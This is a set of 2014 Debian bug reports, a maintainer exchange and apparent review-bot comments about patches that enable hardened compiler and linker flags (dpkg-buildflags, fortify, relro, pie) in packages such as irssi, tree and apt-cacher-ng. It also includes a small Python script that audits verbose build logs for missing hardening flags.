 configureoptions = --prefix=/usr --bindir=/usr/sbin/ --sysconfdir=/etc/bandwidthd/ --localstatedir=/var/lib/
 
 p_bwdstatic = bandwidthd
@@ -15,17 +18,6 @@
 build_bwdpgsql = debian/bandwidthd-pgsql
 
 
-CFLAGS = -Wall
-
-ifneq (,$(findstring debug,$(DEB_BUILD_OPTIONS)))
-	CFLAGS += -g
-endif
-
-ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS)))
-	CFLAGS += -O0
-else
-	CFLAGS += -O2
-endif
 ifeq (,$(findstring nostrip,$(DEB_BUILD_OPTIONS)))
 	INSTALL_PROGRAM += -s
 endif
@@ -41,7 +33,7 @@
 	cp -f /usr/share/misc/config.sub config.sub
 	dh_autoreconf
 	chmod +x configure
-	./configure $(configureoptions) --disable-pgsql
+	$(shell dpkg-buildflags --export=cmdline) ./configure $(configureoptions) --disable-pgsql
 	touch $@
 	
 configure-bwdpgsql: configure-bwdpgsql-stamp
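
Review bot: The `$(shell dpkg-buildflags --export=cmdline)` prefix duplicates what the first hunk already does: with `DPKG_EXPORT_BUILDFLAGS = 1` and the buildflags.mk include, the flags are exported to every recipe command, ./configure included. The prefix is also added only to the `--disable-pgsql` configure call, while the configure-bwdpgsql target in the trailing context is not touched by this diff, so the two builds take their flags by different routes. Drop the prefix and rely on the export, or apply the same mechanism to both targets.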


Bug#762336: Please enable hardened build flags

2014-09-21 Thread Guillaume Delacour
On Sunday 21 September 2014 at 16:11 +0200, Andreas Henriksson
wrote:
> Hello Guillaume Delacour!
>
> Thanks for your patch. Have you tested it?
> Are you sure it doesn't break things?
>
> Too many times have I been asked to enable hardening build
> and then again having to re-disable it again because the
> submitter didn't test things at all and when problems showed
> up the submitter went into hiding

I don't use bandwidthd personally, so I've just installed the generated
deb with hardened flags, started the daemon, left the default
configuration and waited a few minutes to see a first graph with values.
It may need a longer test campaign to be sure everything is ok (my
desktop only has one eth0 interface). I didn't see any similar issue
reported before for bandwidthd (and the fix is simple to implement),
this is why I've opened this bug.

>
> Regards,
> Andreas Henriksson

-- 
Guillaume Delacour g...@iroqwa.org




Bug#761123: Please enable hardened build flags

2014-09-10 Thread Guillaume Delacour
Source: irssi
Version: 0.8.16
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org


Hello,

Please enable hardened build flags with dpkg-buildflags (patch
attached). dpkg-buildflags handles noopt from DEB_BUILD_OPTIONS.

diff -u irssi-0.8.16/debian/rules irssi-0.8.16/debian/rules
--- irssi-0.8.16/debian/rules
+++ irssi-0.8.16/debian/rules
@@ -10,6 +10,8 @@
 #export DH_VERBOSE=1
 
 include /usr/share/quilt/quilt.make
+DPKG_EXPORT_BUILDFLAGS = 1
+include /usr/share/dpkg/buildflags.mk
 
 # These are used for cross-compiling and for saving the configure script
 # from having to guess our platform (since we know it already)
@@ -24,18 +26,6 @@
 MAKEFLAGS += -j$(NUMJOBS)
 endif
 
-
-
-
-CFLAGS = -Wall -g
-
-ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS)))
-	CFLAGS += -O0
-else
-	CFLAGS += -O2
-endif
-
-
 CONFIGURE_SWITCHES = --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) \
 	 --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info \
 	 --sysconfdir=/etc \
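
Review bot: Removing the `CFLAGS = -Wall -g` block drops `-Wall` along with the optimisation handling. dpkg-buildflags supplies -g, the -O level and the noopt handling, but not -Wall, so add `CFLAGS += -Wall` after the buildflags.mk include if the warnings should stay in the build log. The `$(shell dpkg-buildflags --export=cmdline)` prefix in the next hunk prints the tool's own values, so it would have to go as well for that addition to reach ./configure.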
@@ -50,7 +40,7 @@
 	dh_testdir
 	# Add here commands to configure the package.
 	dh_autotools-dev_updateconfig
-	CFLAGS=$(CFLAGS) ./configure $(CONFIGURE_SWITCHES)
+	$(shell dpkg-buildflags --export=cmdline) ./configure $(CONFIGURE_SWITCHES)
 
 
 build: build-arch build-indep


Bug#761127: Please enable hardened build flags

2014-09-10 Thread Guillaume Delacour
Package: heirloom-mailx
Version: 12.5-2
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening


Please enable hardened build flags with dpkg-buildflags (patch
attached). dpkg-buildflags handles noopt from DEB_BUILD_OPTIONS.

diff -Nru heirloom-mailx-12.5/debian/changelog heirloom-mailx-12.5/debian/changelog
--- heirloom-mailx-12.5/debian/changelog	2012-04-14 20:25:21.0 +0200
+++ heirloom-mailx-12.5/debian/changelog	2014-09-10 23:25:46.0 +0200
@@ -1,3 +1,10 @@
+heirloom-mailx (12.5-2.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use dpkg-buildflags and pass *FLAGS to Makefile
+
+ -- Guillaume Delacour g...@iroqwa.org  Wed, 10 Sep 2014 23:16:59 +0200
+
 heirloom-mailx (12.5-2) unstable; urgency=low
 
   * now Provides: mail-reader (Closes: #663384), imap-client
diff -Nru heirloom-mailx-12.5/debian/rules heirloom-mailx-12.5/debian/rules
--- heirloom-mailx-12.5/debian/rules	2012-04-14 20:21:44.0 +0200
+++ heirloom-mailx-12.5/debian/rules	2014-09-10 23:24:08.0 +0200
@@ -5,13 +5,10 @@
 # Uncomment this to turn on verbose mode.
 #export DH_VERBOSE=1
 
-CFLAGS=-Wall -g
-
-ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS)))
-	CFLAGS+=-O0
-else
-	CFLAGS+=-O2
-endif
+CPPFLAGS=$(shell dpkg-buildflags --get CPPFLAGS)
+CFLAGS=$(shell dpkg-buildflags --get CFLAGS)
+CFLAGS+=-Wall
+LDFLAGS=$(shell dpkg-buildflags --get LDFLAGS)
 
 build: build-arch build-indep
 build-arch: build-stamp
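
Review bot: CPPFLAGS, CFLAGS and LDFLAGS are assigned with `=`, so make re-runs `dpkg-buildflags --get ...` every time one of them is expanded. Use `:=` for the three `$(shell ...)` assignments, or include /usr/share/dpkg/buildflags.mk instead, so the tool runs once and every command in the build sees the same values.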
@@ -22,7 +19,8 @@
 	$(MAKE) \
 		PREFIX=/usr \
 		CFLAGS=$(CFLAGS) \
-		CPPFLAGS=-D_GNU_SOURCE \
+		CPPFLAGS=$(CPPFLAGS) -D_GNU_SOURCE \
+		LDFLAGS=$(LDFLAGS) \
 		UCBINSTALL=/usr/bin/install \
 		IPv6=-DHAVE_IPv6_FUNCS \
 		STRIP=true


Bug#761129: Please enable hardened build flags

2014-09-10 Thread Guillaume Delacour
Package: ldapvi
Version: 1.7-9
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening


Hello,

Please enable hardened build flags with dpkg-buildflags (patch
attached). dpkg-buildflags handles noopt from DEB_BUILD_OPTIONS.

diff -u ldapvi-1.7/debian/changelog ldapvi-1.7/debian/changelog
--- ldapvi-1.7/debian/changelog
+++ ldapvi-1.7/debian/changelog
@@ -1,3 +1,11 @@
+ldapvi (1.7-9.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use dpkg-buildflags and pass *FLAGS to configure
+  * Remove compilation generated files (config.status, GNUmakefile, config.h)
+
+ -- Guillaume Delacour g...@iroqwa.org  Wed, 10 Sep 2014 23:40:05 +0200
+
 ldapvi (1.7-9) unstable; urgency=low
 
   * Use fileencoding instead of encoding in vim modeline which makes recent
diff -u ldapvi-1.7/debian/rules ldapvi-1.7/debian/rules
--- ldapvi-1.7/debian/rules
+++ ldapvi-1.7/debian/rules
@@ -11,17 +11,15 @@
 DEB_HOST_GNU_TYPE   ?= $(shell dpkg-architecture -qDEB_HOST_GNU_TYPE)
 DEB_BUILD_GNU_TYPE  ?= $(shell dpkg-architecture -qDEB_BUILD_GNU_TYPE)
 
-CFLAGS = -Wall -g
+CFLAGS=$(shell dpkg-buildflags --get CFLAGS)
+CFLAGS += -Wall
+CPPFLAGS=$(shell dpkg-buildflags --get CPPFLAGS)
+LDFLAGS=$(shell dpkg-buildflags --get LDFLAGS)
 INSTALL = install
 INSTALL_FILE= $(INSTALL) -p-oroot -groot -m644
 INSTALL_PROGRAM = $(INSTALL) -p-oroot -groot -m755
 INSTALL_SCRIPT  = $(INSTALL) -p-oroot -groot -m755
 INSTALL_DIR = $(INSTALL) -p -d -oroot -groot -m755
-ifneq (,$(filter noopt,$(DEB_BUILD_OPTIONS)))
-	CFLAGS += -O0
-else
-	CFLAGS += -O2
-endif
 ifeq (,$(filter nostrip,$(DEB_BUILD_OPTIONS)))
 	INSTALL_PROGRAM += -s
 	STRIP = true
@@ -47,12 +45,14 @@
 	cp -a configure configure.save
 	[ ! -f Makefile ] || $(MAKE) distclean
 	mv configure.save configure
+	# Remove compilation generated files
+	rm -f config.status GNUmakefile config.h
 
 
 build: build-stamp
 build-stamp: patch-stamp
 	$(checkdir)
-	CFLAGS=$(CFLAGS) ./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --with-libcrypto=none
+	CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS) ./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --with-libcrypto=none
 	$(MAKE)
 	cd manual  $(MAKE) manual.html
 	touch build-stamp
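
Review bot: The added `rm -f config.status GNUmakefile config.h` sits under a guard that tests for `Makefile` (`[ ! -f Makefile ] || $(MAKE) distclean`). If configure only generates GNUmakefile, that guard never fires and distclean is never run, which would explain the leftovers; testing for GNUmakefile in the guard would clean up through upstream's own target instead of a hand-kept file list. Say in the comment which of the two is the case.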


Bug#761133: Hardening options incomplete (LDFLAGS)

2014-09-10 Thread Guillaume Delacour
Source: log4cplus
Version: 1.0.4-1.1
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening


Hello,

As you define LDFLAGS, the default exported LDFLAGS is missing (relro).
I also enabled parallel build to speed things up when you have more than
one CPU.

diff -Nru log4cplus-1.0.4/debian/changelog log4cplus-1.0.4/debian/changelog
--- log4cplus-1.0.4/debian/changelog	2014-06-29 08:23:00.0 +0200
+++ log4cplus-1.0.4/debian/changelog	2014-09-11 00:15:39.0 +0200
@@ -1,3 +1,11 @@
+log4cplus (1.0.4-1.2) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Use exported LDFLAGS (relro) in DEB_CONFIGURE_SCRIPT_ENV
+  * Enable parallel build
+
+ -- Guillaume Delacour g...@iroqwa.org  Thu, 11 Sep 2014 00:08:42 +0200
+
 log4cplus (1.0.4-1.1) unstable; urgency=low
 
   * Non-maintainer upload.
diff -Nru log4cplus-1.0.4/debian/rules log4cplus-1.0.4/debian/rules
--- log4cplus-1.0.4/debian/rules	2012-01-19 07:26:19.0 +0100
+++ log4cplus-1.0.4/debian/rules	2014-09-11 00:09:50.0 +0200
@@ -8,8 +8,12 @@
 
 #install/liblog4cplus::
 
+ifneq (,$(filter parallel=%,$(DEB_BUILD_OPTIONS)))
+	NUMJOBS = $(patsubst parallel=%,%,$(filter parallel=%,$(DEB_BUILD_OPTIONS)))
+	MAKEFLAGS += -j$(NUMJOBS)
+endif
 
-DEB_CONFIGURE_SCRIPT_ENV += LDFLAGS=-Wl,-z,defs -Wl,--as-needed -lpthread
+DEB_CONFIGURE_SCRIPT_ENV += LDFLAGS=-Wl,-z,defs -Wl,--as-needed -lpthread $(LDFLAGS)
 DEB_DH_INSTALL_SOURCEDIR := debian/tmp
 
 binary-install/liblog4cplus-dev::
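
Review bot: The parallel-build block is unrelated to the relro fix in the bug title and changes build behaviour on its own: an upstream build that is not parallel-safe would start failing intermittently. Split it into a separate change. For the LDFLAGS line, nothing in this hunk shows where `$(LDFLAGS)` is set in debian/rules, so confirm it is not empty at that point, for example by checking the configure line in a build log for -Wl,-z,relro.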


Bug#760726: Please enable hardened build flags

2014-09-07 Thread Guillaume Delacour
Package: squidguard
Version: 1.5-2+b1
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening


Hello,

Please find attached a patch that enables hardening build flags in your
package. The upstream test suite, run after the build, confirms the good
execution of the binary.


diff -Nru squidguard-1.5/debian/changelog squidguard-1.5/debian/changelog
--- squidguard-1.5/debian/changelog	2014-01-24 21:52:43.0 +0100
+++ squidguard-1.5/debian/changelog	2014-09-07 11:22:24.0 +0200
@@ -1,3 +1,10 @@
+squidguard (1.5-2.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Pass hardened flags through dpkg-buildflags to configure
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 07 Sep 2014 11:21:46 +0200
+
 squidguard (1.5-2) unstable; urgency=low
 
   * Fix small typo in update-squidguard.
diff -Nru squidguard-1.5/debian/rules squidguard-1.5/debian/rules
--- squidguard-1.5/debian/rules	2014-09-07 11:21:09.0 +0200
+++ squidguard-1.5/debian/rules	2014-09-07 11:22:54.0 +0200
@@ -1,11 +1,14 @@
 #!/usr/bin/make -f
 # -*- makefile -*-
 
+export DEB_BUILD_MAINT_OPTIONS = hardening=+all
+
 %:
 	dh $@
 
 override_dh_auto_configure: 
-	dh_auto_configure  -- --with-db=/usr \
+	dh_auto_configure  -- $(shell dpkg-buildflags --export=configure) \
+		--with-db=/usr \
 		--with-ldap=yes --with-ldap-lib=/usr/lib \
 		--with-sg-config=/etc/squidguard/squidGuard.conf \
 		--with-sg-logdir=/var/log/squidguard \
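
Review bot: `$(shell dpkg-buildflags --export=configure)` in override_dh_auto_configure may not see `hardening=+all`. GNU make before 4.4 passes variables marked `export` to recipe commands but not to `$(shell ...)`, so the flags pasted onto the configure line can be the default set, without pie and bindnow. dh_auto_configure itself runs as a recipe command and does inherit the exported variable, so if the package is at debhelper compat 9 the `$(shell ...)` arguments can simply be dropped; either way, confirm the result with hardening-check on the built binary.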


Bug#760749: CPPFLAGS unused

2014-09-07 Thread Guillaume Delacour
Package: tree
Version: 1.7.0-1
Severity: normal
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening


Hello,

Your package doesn't use CPPFLAGS (as upstream Makefile) at build time.
Please find attached a patch that fixes that.


diff -Nru tree-1.7.0/debian/changelog tree-1.7.0/debian/changelog
--- tree-1.7.0/debian/changelog	2014-04-27 10:34:34.0 +0200
+++ tree-1.7.0/debian/changelog	2014-09-07 15:24:21.0 +0200
@@ -1,3 +1,11 @@
+tree (1.7.0-1.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Pass CPPFLAGS at build time (enable D_FORTIFY_SOURCE), patch upstream Makefile
+  * Remove generated binary in clean
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 07 Sep 2014 15:11:27 +0200
+
 tree (1.7.0-1) unstable; urgency=medium
 
   * [63b3dfd] Imported Upstream version 1.7.0 (Closes: #745776)
diff -Nru tree-1.7.0/debian/patches/cppflags.diff tree-1.7.0/debian/patches/cppflags.diff
--- tree-1.7.0/debian/patches/cppflags.diff	1970-01-01 01:00:00.0 +0100
+++ tree-1.7.0/debian/patches/cppflags.diff	2014-09-07 15:18:02.0 +0200
@@ -0,0 +1,17 @@
+Author: Guillaume Delacour g...@iroqwa.org
+Subject: Use CPPFLAGS in upstream Makefile
+Last-Update: 2014-09-07
+
+Index: tree-1.7.0/Makefile
+===
+--- tree-1.7.0.orig/Makefile
 tree-1.7.0/Makefile
+@@ -87,7 +87,7 @@ tree:	$(OBJS)
+ 	$(CC) $(LDFLAGS) -o $(TREE_DEST) $(OBJS)
+ 
+ $(OBJS): %.o:	%.c tree.h
+-	$(CC) $(CFLAGS) -c -o $@ $
++	$(CC) $(CFLAGS) $(CPPFLAGS) -c -o $@ $
+ 
+ clean:
+ 	if [ -x $(TREE_DEST) ]; then rm $(TREE_DEST); fi
diff -Nru tree-1.7.0/debian/patches/series tree-1.7.0/debian/patches/series
--- tree-1.7.0/debian/patches/series	2014-04-27 10:34:34.0 +0200
+++ tree-1.7.0/debian/patches/series	2014-09-07 15:12:45.0 +0200
@@ -1 +1,2 @@
 PATH_MAX
+cppflags.diff
diff -Nru tree-1.7.0/debian/rules tree-1.7.0/debian/rules
--- tree-1.7.0/debian/rules	2014-04-27 10:34:34.0 +0200
+++ tree-1.7.0/debian/rules	2014-09-07 15:23:01.0 +0200
@@ -17,10 +17,14 @@
 CFLAGS += -Wall -DLINUX -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64
 
 override_dh_auto_build:
-	$(MAKE) CFLAGS=$(CFLAGS) LDFLAGS=$(LDFLAGS)
+	$(MAKE) CFLAGS=$(CFLAGS) LDFLAGS=$(LDFLAGS) CPPFLAGS=$(CPPFLAGS)
 
 override_dh_auto_install:
 	$(MAKE) install prefix=$(prefix) MANDIR=$(MANDIR)
 
+override_dh_clean:
+	dh_clean
+	rm -f tree
+
 %:
 	dh $@ 
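
Review bot: Now that `CPPFLAGS=$(CPPFLAGS)` is passed to make, the preprocessor defines in the context line at the top of this hunk (`-DLINUX -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64`) are still appended to CFLAGS. Move them to `CPPFLAGS +=` so that all -D options travel together with -D_FORTIFY_SOURCE=2 and only -Wall stays in CFLAGS. The `rm -f tree` in override_dh_clean deserves a one-line comment saying why upstream's clean target is not enough.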


Bug#760699: Hardened build flags not fully enabled

2014-09-07 Thread Guillaume Delacour
On Sunday 07 September 2014 at 03:40 +0200, Guillaume Delacour
wrote:
> Package: apt-cacher-ng
> Version: 0.7.27-1
> Severity: important
> Tags: patch
> User: hardening-disc...@lists.alioth.debian.org
> Usertags: goal-hardening
>
> Hello,
>
> Please find attached a patch that enables all hardening flags in your
> package.
>
> Although apt-cacher-ng uses dh/9, CPPFLAGS (fortify) was not enabled.
> Besides since debhelper 0.9.20120417 handles the workaround appending
> CPPFLAGS to CXXFLAGS, I still had to do (I've not investigated though).
> I've also enabled the optionals pie and bindnow.

debhelper must handle the situation
(/usr/share/perl5/Debian/Debhelper/Buildsystem/cmake.pm, sub configure)
and enable verbose compiler command lines; there is a problem somewhere
(due to the package or in debhelper itself). As it concerns some other
packages, I'll take a look and report back.

>
> After the build I've made some tests (apt-get update  apt-get install
> $package through apt-cacher-ng) which confirm that it won't break
> anything (at least at first glance).
>
> Finally, I've made the build verbose to let blhc see if all flags are
> enabled in the future.
>
>

-- 
Guillaume Delacour g...@iroqwa.org





Bug#760699: Hardened build flags not fully enabled

2014-09-07 Thread Guillaume Delacour
On Sunday 07 September 2014 at 21:35 +0200, Eduard Bloch wrote:
> Hello,
> * Guillaume Delacour [Sun, Sep 07 2014, 08:54:13PM]:
> > On Sunday 07 September 2014 at 03:40 +0200, Guillaume Delacour
> > wrote:
> > > Package: apt-cacher-ng
> > > Version: 0.7.27-1
> > > Severity: important
> > > Tags: patch
> > > User: hardening-disc...@lists.alioth.debian.org
> > > Usertags: goal-hardening
> > >
> > > Hello,
> > >
> > > Please find attached a patch that enables all hardening flags in your
> > > package.
> > >
> > > Although apt-cacher-ng uses dh/9, CPPFLAGS (fortify) was not enabled.
> > > Besides since debhelper 0.9.20120417 handles the workaround appending
> > > CPPFLAGS to CXXFLAGS, I still had to do (I've not investigated though).
> > > I've also enabled the optionals pie and bindnow.
> >
> > debhelper must handle the situation
> > (/usr/share/perl5/Debian/Debhelper/Buildsystem/cmake.pm, sub configure)
> > and enable verbose compiler command lines, there is a problem somewhere
> > (due to package or in debhelper itself). As it concerns some other
> > packages, I'll take a look and report back.
>
> Uhm... I have a wrapper GNUMakefile there for convenience, which builds
> the source out-of-source-tree and also extends CXXFLAGS as needed. Maybe
> that's the reason why tweaking CMake internal variables is not really
> effective.
>
> And I guess that this method is not uncommon since CMake tends to be
> very messy and the best way to get reproducible builds actually to make
> OOST builds and wipe the directory on cleaning.

This is exactly the reason why debhelper does not consider this a real
cmake build system, because of the presence of GNUmakefile.

To have a verbose build instead of dh_auto_build -- VERBOSE=1:

export CMAKEOPTS+=-DCMAKE_VERBOSE_MAKEFILE=ON

Do the job but when the fortify flag disappear (!).

For CPPFLAGS (which is ignored by CMake itself) i tried different
methods such as:

include /usr/share/dpkg/buildflags.mk
CFLAGS+=$(CPPFLAGS)
CXXFLAGS+=$(CPPFLAGS)

Another one:
export CMAKEOPTS+=-DCMAKE_VERBOSE_MAKEFILE=ON 
-DCMAKE_C_FLAGS_RELWITHDEBINFO:STRING=$(CXXFLAGS) -D_FORTIFY_SOURCE=2


With no success.


Anyway, the first patch works (but maybe needs some documentation about
the special use case), but feel free to do it differently; the goal is to
enable all build flags dynamically through dpkg-buildflags to handle
future compiler options and to have a verbose build (meaning full compiler
command lines) to check the presence of flags in buildd logs.

You can use hardening-wrapper (from hardening-includes package) to test
the generated binary against flags:

$ hardening-check build/apt-cacher-ng 
build/apt-cacher-ng:
 Position Independent Executable: yes
 Stack protected: yes
 Fortify Source functions: yes (some protected functions found)
 Read-only relocations: yes
 Immediate binding: yes

 
 Regards,
 Eduard.
 

-- 
Guillaume Delacour g...@iroqwa.org
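
The check this thread relies on (full compiler command lines in the build log, inspected for the dpkg-buildflags hardening flags), as an added example that is not part of the original messages and is not blhc's code. The log is constructed, the function names are made up for illustration, and the expected flag set assumes dpkg-buildflags with hardening=+all.

```python
"""Audit a verbose build log for missing dpkg-buildflags hardening flags."""
import os
import re
import shlex

# Constructed sample of a VERBOSE=1 build log (file names are made up).
SAMPLE_LOG = """\
[ 50%] Building CXX object CMakeFiles/demo.dir/a.cc.o
/usr/bin/c++ -g -O2 -fPIE -fstack-protector-strong -Wformat -Werror=format-security -D_FORTIFY_SOURCE=2 -o a.cc.o -c a.cc
/usr/bin/c++ -g -O2 -fPIE -fstack-protector-strong -Wformat -Werror=format-security -o b.cc.o -c b.cc
x86_64-linux-gnu-gcc -g -O0 -fPIE -fstack-protector-strong -Wformat -Werror=format-security -D_FORTIFY_SOURCE=2 -o c.o -c c.c
/usr/bin/c++ -fPIE -pie -Wl,-z,relro -Wl,-z,now a.cc.o b.cc.o -o demo
/usr/bin/cc -Wl,-z,relro c.o -o helper
"""

# Matches cc, gcc, g++, c++, clang, with optional target prefix and version.
COMPILER = re.compile(r"(?:.*-)?(?:gcc|g\+\+|cc|c\+\+|clang\+\+|clang)(?:-[\d.]+)?")
NO_OPT = "-O2 (fortify is a no-op without optimisation)"


def fortify_problem(tokens):
    """Return what is missing for _FORTIFY_SOURCE to be effective, or None."""
    level, optimised = 0, False
    for tok in tokens:                      # later options override earlier ones
        if tok.startswith("-D_FORTIFY_SOURCE="):
            value = tok.split("=", 1)[1]
            level = int(value) if value.isdigit() else 0
        elif tok == "-U_FORTIFY_SOURCE":
            level = 0
        elif tok.startswith("-O"):
            optimised = tok != "-O0"
    if level == 0:
        return "-D_FORTIFY_SOURCE=2"
    return None if optimised else NO_OPT


def linker_z_options(tokens):
    """Collect keywords handed to the linker as -Wl,-z,<keyword>."""
    found = set()
    for tok in tokens:
        if tok.startswith("-Wl,"):
            parts = tok.split(",")[1:]
            for flag, value in zip(parts, parts[1:]):
                if flag == "-z":
                    found.add(value)
    return found


def missing_flags(tokens, hardening_all=True):
    """Return (kind, missing) for a compiler command line, None for other lines."""
    if not tokens or not COMPILER.fullmatch(os.path.basename(tokens[0])):
        return None
    missing = []
    if "-c" in tokens:                      # compile step: CPPFLAGS and CFLAGS
        kind = "compile"
        problem = fortify_problem(tokens)
        if problem:
            missing.append(problem)
        if not any(t.startswith("-fstack-protector") for t in tokens):
            missing.append("-fstack-protector-strong")
        if "-Wformat" not in tokens or "-Werror=format-security" not in tokens:
            missing.append("-Wformat -Werror=format-security")
        if hardening_all and "-fPIE" not in tokens and "-fPIC" not in tokens:
            missing.append("-fPIE")
    elif "-o" in tokens:                    # link step: LDFLAGS
        kind = "link"
        zopts = linker_z_options(tokens)
        if "relro" not in zopts:
            missing.append("-Wl,-z,relro")
        if hardening_all and "now" not in zopts:
            missing.append("-Wl,-z,now")
        if hardening_all and "-pie" not in tokens and "-shared" not in tokens:
            missing.append("-pie")
    else:
        return None
    return kind, missing


def audit(log_text, hardening_all=True):
    """Return [(line_number, kind, missing)] for command lines lacking a flag."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        try:
            tokens = shlex.split(line)
        except ValueError:                  # unbalanced quote in a progress line
            tokens = line.split()
        result = missing_flags(tokens, hardening_all)
        if result and result[1]:
            findings.append((number, result[0], result[1]))
    return findings


if __name__ == "__main__":
    for number, kind, missing in audit(SAMPLE_LOG):
        print(f"line {number}: {kind} step lacks {', '.join(missing)}")
```

A silent build defeats this kind of audit entirely, which is why the thread insists on VERBOSE=1 or V=1 before looking at the flags.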




Bug#760792: Enable verbose build

2014-09-07 Thread Guillaume Delacour
Package: minidlna
Version: 1.1.2+dfsg-1.1+b1
Severity: minor
Tags: patch


Hi,

configure is called directly from override_dh_auto_configure in
debian/rules, which overwrites all other options (such as
--disable-silent-rules) passed via debhelper.

Unless there is a good reason to do that, please consider passing the
overridden options instead; this gives the possibility to enable a verbose
build to detect compiler build flags on buildd.

diff -Nru minidlna-1.1.2+dfsg/debian/changelog minidlna-1.1.2+dfsg/debian/changelog
--- minidlna-1.1.2+dfsg/debian/changelog	2014-06-16 12:01:30.0 +0200
+++ minidlna-1.1.2+dfsg/debian/changelog	2014-09-07 23:02:03.0 +0200
@@ -1,3 +1,12 @@
+minidlna (1.1.2+dfsg-1.2) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Don't call ./configure directly but pass overriden options to
+dh_auto_configure instead; this make possible to enable verbose build on
+buildd
+
+ -- Guillaume Delacour g...@iroqwa.org  Sun, 07 Sep 2014 22:49:35 +0200
+
 minidlna (1.1.2+dfsg-1.1) unstable; urgency=medium
 
   * Non-maintainer upload.
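Review bot: The new changelog entry does not close the report it answers; add (Closes: #760792) to the bullet so the upload closes the bug. In the same bullet, "overriden" should be "overridden" and "this make possible" should read "this makes it possible".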
diff -Nru minidlna-1.1.2+dfsg/debian/rules minidlna-1.1.2+dfsg/debian/rules
--- minidlna-1.1.2+dfsg/debian/rules	2014-04-28 22:33:25.0 +0200
+++ minidlna-1.1.2+dfsg/debian/rules	2014-09-07 23:02:15.0 +0200
@@ -9,7 +9,7 @@
 	dh $@ --with autoreconf
 
 override_dh_auto_configure:
-	./configure --prefix=$(PREFIX) --sbindir=$(PREFIX)/bin
+	dh_auto_configure -- --prefix=$(PREFIX) --sbindir=$(PREFIX)/bin
 
 override_dh_installchangelogs:
 	dh_installchangelogs NEWS
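Review bot: In override_dh_auto_configure, switching to dh_auto_configure brings in every default argument debhelper passes to configure, not only --disable-silent-rules; the explicit --prefix=$(PREFIX) and --sbindir=$(PREFIX)/bin after the -- still win for those two, but the other directory options now come from debhelper instead of upstream defaults. Compare the file list of the rebuilt package with the previous one and mention any path change in the changelog.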


Bug#760699: Hardened build flags not fully enabled

2014-09-06 Thread Guillaume Delacour
Package: apt-cacher-ng
Version: 0.7.27-1
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening


Hello,

Please find attached a patch that enables all hardening flags in your
package.

Although apt-cacher-ng uses dh/9, CPPFLAGS (fortify) was not enabled.
Besides, since debhelper 0.9.20120417 handles the workaround of appending
CPPFLAGS to CXXFLAGS, I still had to do it (I've not investigated though).
I've also enabled the optional pie and bindnow.

After the build I've made some tests (apt-get update  apt-get install
$package through apt-cacher-ng) which confirm that it won't break
anything (at least at first glance).

Finally, I've made the build verbose to let blhc see if all flags are
enabled in the future.


diff -Nru apt-cacher-ng-0.7.27/debian/rules apt-cacher-ng-0.7.27/debian/rules
--- apt-cacher-ng-0.7.27/debian/rules	2014-07-17 21:35:38.0 +0200
+++ apt-cacher-ng-0.7.27/debian/rules	2014-09-07 02:55:35.0 +0200
@@ -3,9 +3,16 @@
 TGT=$(CURDIR)/debian/apt-cacher-ng
 CDIR=$(TGT)/etc/apt-cacher-ng
 
+export DEB_BUILD_MAINT_OPTIONS = hardening=+all
+# cmake doesn't follow CPPFLAGS, see #653916
+CXXFLAGS+=$(CPPFLAGS)
+
 %:
 	dh $@ --parallel --with systemd
 
+override_dh_auto_build:
+	dh_auto_build -- VERBOSE=1
+
 override_dh_install:
 	dh_install $(test -e build/acngfs || echo -Xacngfs)
 	cp systemd/apt-cacher-ng.service debian
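Review bot: CXXFLAGS+=$(CPPFLAGS) only helps if both variables already hold the dpkg-buildflags values at that point and the result reaches cmake; the hunk shows neither an include of /usr/share/dpkg/buildflags.mk nor an export of CXXFLAGS, so confirm in the VERBOSE=1 output that -D_FORTIFY_SOURCE=2 really appears on the compile lines. CFLAGS gets no such treatment, so any C source in the build would still be compiled without the preprocessor flags; add CFLAGS+=$(CPPFLAGS) as well or state that the package is C++ only.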


Bug#760567: Use dpkg-buildflags

2014-09-05 Thread Guillaume Delacour
Source: redis
Version: 2.8.13
Severity: normal
Tags: patch

Hi,

Please find attached a proposal that uses dpkg-buildflags (and hardening
flags) and enables multiple make jobs in your package.

Please note that *FLAGS are defined and exported manually in debian/rules since
the package uses debhelper 7 (these 4 lines can be removed if debhelper 9 is used).

-- System Information:
Debian Release: jessie/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.2.0-67-generic (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash
diff -Nru redis-2.8.13/debian/changelog redis-2.8.13/debian/changelog
--- redis-2.8.13/debian/changelog	2014-08-05 18:16:56.0 +0200
+++ redis-2.8.13/debian/changelog	2014-09-05 14:31:00.0 +0200
